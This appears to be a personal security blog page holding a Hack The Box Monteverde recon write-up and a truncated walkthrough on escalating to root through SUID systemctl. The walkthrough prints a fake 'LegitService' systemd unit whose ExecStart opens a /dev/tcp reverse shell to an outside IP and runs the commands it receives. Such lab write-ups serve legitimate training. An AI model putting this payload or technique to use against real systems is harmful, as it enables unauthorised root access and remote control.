circusmonkey404's Security Site

Hackthebox.eu - Retired - Monteverde Recon As always I start with a simple UP/Down scan on all TCP ports to see what is open   nmap -T4 -p- -oX /root/Desktop/HTB/monteverde/nmapb.xml 10.10.10.172 Then I convert that to HTML xsltproc /root/Desktop/HTB/monteverde/nmapb.xml -o /root/Desktop/HTB/monteverde/nmapb.html That’s a bunch of open ports. Lets run nmap again against these ports with the -A switch to try and finger OS/Service nmap -T4 -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49669,49670,49673,49702 -A -oX /root/Desktop/HTB/monteverde/nmaf.xml 10.10.10.172 Then convert that to HTML xsltproc /root/Desktop/HTB/monteverde/nmaf.xml -o /root/Desktop/HTB/monteverde/nmapf.html    *****fixed my little typo here in the name of the file Ok It looks like a windows box, and a Domain controller at that. We can see megabank.local for a domain name, we can also see what looks like winRM on 5985 Let’s try to see if we can see anything on smb It’s there and allowed us to connect

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The